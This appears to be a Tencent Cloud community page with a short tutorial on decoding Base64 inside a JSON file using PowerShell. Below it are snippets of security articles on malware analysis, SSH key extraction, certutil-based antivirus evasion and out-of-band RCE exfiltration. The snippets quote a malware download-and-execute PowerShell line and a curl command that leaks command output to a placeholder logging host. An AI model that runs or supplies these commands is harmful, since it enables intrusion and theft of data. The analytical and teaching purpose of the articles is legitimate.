首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

用Powershell只在JSON文件的一部分解码Base64

Powershell是一种跨平台的脚本语言,它可以用于自动化任务和系统管理。在处理JSON文件时,可以使用Powershell来解码Base64编码的数据。

首先,我们需要使用Powershell的Get-Content命令来读取JSON文件的内容,并将其存储在一个变量中。假设我们的JSON文件名为data.json,可以使用以下命令来读取文件内容:

代码语言:txt
复制
$jsonContent = Get-Content -Raw -Path "data.json"

接下来,我们可以使用Powershell的ConvertFrom-Json命令将JSON字符串转换为Powershell对象。在这个过程中,如果JSON文件中包含Base64编码的数据,我们可以使用Powershell的[System.Convert]类的FromBase64String方法来解码这部分数据。以下是解码Base64的示例代码:

代码语言:txt
复制
# 读取JSON文件内容
$jsonContent = Get-Content -Raw -Path "data.json"

# 将JSON字符串转换为Powershell对象
$jsonObject = $jsonContent | ConvertFrom-Json

# 解码Base64数据
$base64Data = $jsonObject.Base64Data
$decodedData = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Data))

在上述示例中,我们假设JSON文件中有一个名为Base64Data的属性,它包含了Base64编码的数据。解码后的数据存储在变量$decodedData中。

需要注意的是,以上示例仅展示了如何使用Powershell解码JSON文件中的Base64数据的一部分。实际应用中,可能还需要根据具体需求进行进一步的处理和操作。

关于Powershell的更多信息和用法,您可以参考腾讯云的Powershell开发者指南:Powershell开发者指南

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

从一个恶意活动中学习 PowerShell 解码

在检查日志后,可以发现以随机字符命名的服务名称出现,如下图中所示,圈起来的部分,它的属性看起来非常有趣: 提示:Autoruns 保存的数据文件为 arn 格式 按照常理来说,Windows Server...以下为一张 base64 代码快速预览表,我把它们都放在了一起: base64 代码 解码 描述 JAB $....现在把 H4sIAAAAA[..]GDQAA 进行 base64 解码,如下图所示: 3 第三层 – The Last Beacon 查看解码后的内容,并没有什么东西能引起我的注意,看不到 URL,...我们遇到过攻击者将 PE 文件代码嵌入在脚本文件中,什么是 ShellCode?...操作系统,而无需用户干预; 在分析了 ShellCode 之后,我们发现它是 Cobalt Strike 的一部分。

91740

从Windows 10 SSH-Agent中提取SSH私钥

过去我曾有过劫持ssh-agent.的相关经验,并尝试过一些有趣的测试,所以我决定开始查看Windows是如何“安全地”用这个新的服务来存储您的私钥的。...返回的Base64看起来不像是私钥,但我只是为了好玩而解码它,然而对于里面出现的“ssh-rsa”字符串我感到非常的惊喜。 ? 找出二进制格式 这部分是我花时间最长的一部分。...我知道我有某种键的二进制表示,但我无法找出格式或如何使用它。 我用openssl,puttygen和ssh-keygen来生成各种RSA密钥,但从来没有得到类似于我拥有的二进制文件的任何东西。...由于我不知道如何在Powershell中解析二进制数据,所以我把所有的密钥保存到了一个JSON文件中,然后我可以在Python中导入。Powershell脚本只有几行: ?...从Powershell脚本生成的JSON将输出所有的RSA私钥: ? 这些RSA私钥是未加密的。虽然我创建它们时,添加了一个密码,但它们使用ssh-agent未加密存储,所以我不再需要密码。

2.7K30
  • DNS劫持欺骗病毒“自杀”

    在系统磁盘下windows目录下发现多个随机命名的exe文件,以及mimikatz的运行日志文件,包括powershell文件。发现中毒后第一时间使用杀毒软件清理病毒,简单粗暴!...病毒利用powershell远程下载一段新的powershell代码执行,这里会定时下载新的病毒文件执行挖矿并开始蠕虫式传播。...通过远程下载后拿到病毒代码,发现powershell代码被混淆过,在简单解码后主要内容可以看出: ? ?...首先分析powershell代码,base64解码后得到地址: IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'...| Stop-Process -For 将上述的代码通过base64加密后放到我们自己搭建的web服务上,web服务代码如下,当然也可以直接通过配置nginx返回要替换的ps代码,这里我用pytohn

    2.5K30

    这款开源神器,堪称程序员界的「瑞士军刀」!

    其主要原因,是里面集成了诸多实用的开发者工具,比如 JSON 格式化、正则表达式测试、Base64 编码与解码、PNG/JPEG 图片压缩、色盲模拟器等功能。...JSON 转 YAML 文件: 正则表达式测试: Markdown 预览: Hash 生成: 聊完功能,我们再来看下如何安装和使用。...咱们重点来看下它一个比较酷的地方:通过 PowerShell 快速启动各类工具。 方法很简单,就是在软件安装成功之后,打开 PowerShell,运行类似 start devtoys:?...tool=jsonformat {tool name} 支持多种参数,你可以根据不同参数名称,用 PowerShell 来快速打开不同工具。...总的来说,这款工具还是比较强大的,不过里面的部分功能需要付费才能使用,大家可仔细考量,自行斟酌。 倘若你实在不想付费,也可以直接用 Xcode 编译该项目的 GitHub 源码,在本机运行。

    1.5K20

    隐藏在注册表的恶意软件 – Poweliks

    Poweliks只在计算机的注册表里面存储它的组件,所以很难通过普通的防病毒软件进行检测。 ?...GData公司发布的文章提到,Poweliks所有的活动都存储在注册表中,没有任何文件被创建过,所以能够绕过传统的恶意软件文件扫描技术,并且能够执行任意操作。...Poweliks行为特征: 1、利用Microsoft Word中的漏洞制作Word文件,然后通过电子邮件方式传播 2、创建一个隐藏的自启动注册表项 3、解码该启动项之后发现:代码中一部分会判断系统是否安装了...PowerShell,另外一部分是经过Base64编码的PowerShell脚本, 该脚本调用并执行攻击者定义的shellcode 4、shellcode会执行Windows二进制文件的payload...,该payload会查询机器硬编码的IP地址,以接受攻击者的进一步指令 5、以上所有的执行过程全部存储在注册表中,没有任何文件被创建 Poweliks是一个功能非常复杂的软件软件,它使用多个代码来隐藏自身

    1.5K100

    针对哈萨克斯坦的基于多阶段 PowerShell 的攻击

    该 lib7.ps1 下载来自同一个帐户Github上,并将其存储在PDF文件目录中(其实可以下载在更隐蔽的目录中)。...运行的 PowerShell 脚本包含一个 Base64 编码,解码后,在 CBC 模式下由三重 DES (3DES) 算法解密: 脚本的第一部分定义了一个名为 heller 的函数,作用是提升系统权限并允许绕过...解密命令后,我们可以看到UAC绕过的过程,包括在Task Scheduler中创建一个SilentCleanup任务,调用PowerShell以更高的权限执行创建的vbs文件。...虽然经过免杀处理,但还是明显看出来是coabltstrike的powershell payload。采用 base64 编码并使用 35 密钥进行 XOR 加密。...在解码和解密 ShellCode 后,它使用 VirtualAlloc 将其分配到内存中,最后通过调用 Invoke 函数执行它。

    97720

    干货 | Certutil在渗透中的利用和详解

    渗透中主要利用其 下载、编码、解码、替代数据流 等功能。 这里我首先在命令行用certutil -?...查看一下certutil所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。...certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...这里我在本地搭建一个http服务器,然后在配置了360的虚拟机cmd下进行下载 这里我为了更好的还原环境,先与虚拟机建立ipc连接后用psexec得到了命令行的cmd环境 这里我用常规的命令进行下载exe...值 certutil配合powershell内存加载 这里我在本地实验因为环境变量的原因报错,这里还是粗略的写一下大致实现过程 首先修改powershell策略为可执行脚本 下载powershell

    2.3K20

    干货 | Certutil在渗透中的利用和详解

    渗透中主要利用其 下载、编码、解码、替代数据流 等功能。 这里我首先在命令行用certutil -?...查看一下certutil所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。 ?...certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...:8000/artifact.exe delete certutil base64加解密 之前在实战中就碰到过需要进行内网穿透的时候,代理软件上传不到靶机的情况 ?...certutil配合powershell内存加载 这里我在本地实验因为环境变量的原因报错,这里还是粗略的写一下大致实现过程 首先修改powershell策略为可执行脚本 ?

    6.3K61

    隐藏在证书文件中的PowerShell(一)

    自从Casey Smith在Twitter上发推演示了Certutil 的 base64解码编码之后,一些红队人员和网络犯罪份子就开始利用这种编码技术来生成各种可绕过入侵检测和杀毒软件的恶意文件。...而base64编码是以6个比特块来编码的,所以 010011 就是第一个被编码的块,010011 用十进制表示就是19,而在base64编码中,0编码成A,1编码成B,以此类推…,19则被编码成T,如下所示...如我们前述的PE文件编码说明,可以确定其在ASCII字节环境下,它是以0x30开头的,而在base64编码过程中,它首先则是以大写字母M开头的。...它的被检测率为0,也就是全部通过,但当我们用base64dump.py对它进行base64解码之后,看到了一些有意思的发现: 这个证书文件竟然包含了经过编码的PowerShell脚本程序,吓得我们….。...这个脚本的检测需要几个步骤,在《隐藏在证书文件中的PowerShell》系列的第2部份,我们会继续讨论。

    1.5K30

    带外攻击OOB(RCE无回显骚思路总结)

    很容易看出来,这种方式数据不容易被阻塞,并且可以通过在我们的服务器端程序里面捕捉SIGURG信号来及时接受数据。这正是我们所要求的效果。...再例如 XXE,引入外部文件时,如果程序也不返回任何信息和引用文件的内容,而只提示输入的是否有误,那么也无法直接判断程序是否存在 XXE 漏洞,我们也可以叫盲 XXE。...powershell搭配,但杀毒软件往往禁用powershell,因此利用条件较苛刻3.在线网站DNS/HTTP管道解析经常在拿下shell的时候碰到命令执行无回显的情况,因此为了解决命令执行无回显时,...cmd=curl http://XXXXXX.ceye.io/`ls -al | sed -n '2p'`结果:http://XXXXXX.ceye.io/drwxr-xr-x发现空格不能被带出来,用base64...temp文件中,再对temp文件进行base64加密变成temp2文件,再对temp2文件中的多余字符"CERTIFICATE"删掉变成temp3,再对temp3的内容删除换行符生成所有数据只在一行的temp4

    5.8K40

    黑客在 Log4j 攻击中使用新的 PowerShell 后门

    据观察,被认为是伊朗 APT35 国家支持组织(又名“迷人小猫”或“磷”)的一部分的黑客利用 Log4Shell 攻击来释放新的 PowerShell 后门。...然而,作为他们研究的一部分,分析师们还发现了一个名为“CharmPower”的 PowerShell 模块化后门形式的新东西。...用于多项任务的模块化后门 对 CVE-2021-44228 的利用会导致运行带有 base64 编码负载的 PowerShell 命令,最终从参与者控制的 Amazon S3 存储桶中获取“CharmPower...核心模块不断向 C2 发送 HTTP POST 请求,这些请求要么没有得到答复,要么收到一个 Base64 字符串,该字符串启动下载额外的 PowerShell 或 C# 模块。...命令执行- 具有 Invoke-Expression、cmd 和 PowerShell 选项的远程命令执行模块。 清理- 删除受感染系统中留下的所有痕迹的模块,例如注册表和启动文件夹条目、文件和进程。

    7.1K10

    记一次 PowerShell 免杀实战

    powershell 具有在硬盘中易绕过,内存中难查杀的特点。...一般在后渗透中,攻击者可以在计算机上执行代码时,会下载 powershell 脚本来执行,ps1 脚本文件无需写入到硬盘中,直接可以在内存中执行 0x02 前戏 常见的 powershell 攻击工具有...既然是把字符串进行加载不如整个编一个 base64?然后在解码后加载,想着想着就开始尝试了: 首先把字符串全部给 base64,我这里先用 burp base64 ?...然后扔进去在加载之前 base64 还原 把编码后的代码解码后加载,顺便搞一个 UTF-8 ?...尝试修改变量的名称来绕过 发现没什么太大的用处,还剩两个 尝试把 base64 编码后的字符串拆开看看 ? 把上面的 base64 的字符串猜开来在 base64 的时候组合一下 ?

    2.2K10

    云桌面文件上传限制绕过

    文章前言 有时候我们在对内网环境环境进行渗透时发现了可渗透的云桌面并且进入到了云桌面的操作界面时,此时我们想要对该内网进行进一步的渗透测试却发现当我们上传一些工具到云桌面时却无法上传exe文件,但是可以上传诸如...txt的文本文件,而且云桌面不出网,在这种情况下我们可以考虑通过window系统自带的一些工具来实现对文件上传限制的绕过 具体实现 CertUtil Windows 7之后的windows系统自带CertUtil...命令,它可以用于MD5、SHA1等算法的加密和解密操作,我们可以使用CertUtil对我们想要上传的exe文件进行base64加密并输出未文本之后在通过目标主机上的certUtil将其还原从而实现上传文件的目的...Powershell亦可以用于加密解密操作,这里的思路和上面一致,我们可以使用Powershell对想要上传到目标云桌面的exe程序进行base64加密操作并转为txt格式,之后上传txt到云桌面,...最后在云桌面在调用系统自带的Powershell进行解密还原exe程序即可,下面是具体实现: Step 1:Fscan执行结果如下 Step 2:使用PowerShell进行base64编码,将fscan64

    3.9K10

    内网渗透之云桌面文件上传限制绕过

    文章前言 有时候我们在对内网环境环境进行渗透时发现了可渗透的云桌面并且进入到了云桌面的操作界面时,此时我们想要对该内网进行进一步的渗透测试却发现当我们上传一些工具到云桌面时却无法上传exe文件,但是可以上传诸如...txt的文本文件,而且云桌面不出网,在这种情况下我们可以考虑通过window系统自带的一些工具来实现对文件上传限制的绕过 具体实现 CertUtil Windows 7之后的windows系统自带CertUtil...命令,它可以用于MD5、SHA1等算法的加密和解密操作,我们可以使用CertUtil对我们想要上传的exe文件进行base64加密并输出未文本之后在通过目标主机上的certUtil将其还原从而实现上传文件的目的...Powershell亦可以用于加密解密操作,这里的思路和上面一致,我们可以使用Powershell对想要上传到目标云桌面的exe程序进行base64加密操作并转为txt格式,之后上传txt到云桌面,最后在云桌面在调用系统自带的...Powershell进行解密还原exe程序即可,下面是具体实现: Step 1:Fscan执行结果如下 Step 2:使用PowerShell进行base64编码,将fscan64.exe编码输出未txt

    14310

    供应链投毒预警 | 开源供应链投毒202401最新月报来啦!

    目前主流的投毒攻击方式包括:恶意文件执行代码混淆执行恶意文件下载shell 命令执行恶意文件释放恶意代码内存执行其中,恶意文件执行是最常见的投毒攻击方式,占比高达 77%,其攻击流程主要利用开源组件管理器在安装组件包过程中通过投毒者自定义的恶意指令来自动加载执行内置在组件包中的恶意代码文件...base64、ascii 等编码) 转换为可显字符串后内嵌到投毒包代码文件中。...Run 函数先将 base64 编码的 url 进行解码后通过 urllib 远程下载 base64 编码的恶意代码,最后会对恶意代码进行 base64 解码后调用 subprocess.Popen 启动新进程执行第二阶段的.../macd.b64解码后的第二阶段python攻击代码如下所示:第二阶段python攻击代码调用send函数先将base64编码的update_information_url进行解码后通过urllib远程下载第三阶段加密的恶意代码...)进行投毒攻击,主要通过在 package.json 中定义 postinstall 指令,postinstall 指令在安装投毒包时将自动触发执行包含混淆代码的 postinstall.js 恶意文件

    36710

    利用USB橡皮鸭在目标机器上启动Empire或Meterpreter会话

    大多数机器之前从未运行或加载过Ducky(或者特定的VID/PID),所以你必须假设加载驱动程序,将是我们在物理攻击中相对耗时和必不可少的一部分。...声东击西:在3秒内执行Pastebin 步骤1:BASE64解码STAGER ?...步骤2:将stager上传至Pastebin 将Base64解码的PowerShell复制粘贴至Pastebin并且保存原始路径。确保使用安全的https链接以避免检测。...步骤1:将RUBBER DUCKY固件更新到Twin Duck 步骤2:添加驱动标签 步骤3:BASE64解码EMPIRE STAGER并将其上传到PASTEBIN 步骤4:在POWERSHELL中创建调度任务...“DUCKY”的驱动器,然后提取该驱动器的字母,并将PowerShell文件追加到字符串并执行该脚本。

    1.7K70

    使用HTTP 404-File Not Found的C2

    来控制系统并获得系统的响应. 0x01方法 第一部分是通过添加和配置.htaccess文件来设置Web服务器,以将任何错误页面定向到我选择的.html文件(下面将其重定向到evil.html)...,即 C2 服务器. 0x02 这是代码中最简单的部分.我们把要对受感染的系统执行的命令通过base64对进行编 码,将它放入带有预定义标头的html注释中,然后包装到html文件中.在最后将它覆盖到...如果是404页面,则检查其源代码中是否包含注释.如果找到注释,则检查注释中的标题是否与预定义的标题匹配.如果标题匹配,则解码base64字符串并执行命令. ?...我在 C2 解决此问题的方法是确定受感染的系统是Linux还是Windows.在Windows 上使用PowerShell执行一些与Linux中相同的基本命令,然后将其作为在base64中重新编码的PowerShell...下面,我将创建一个文件,列出内容,然后显示404页和该页的源代码. 在C2服务器上,我能够运行命令,所以我使用PowerShell命令并在当前目录(桌面)中. 创建了一个空文件 ?

    1K21
    领券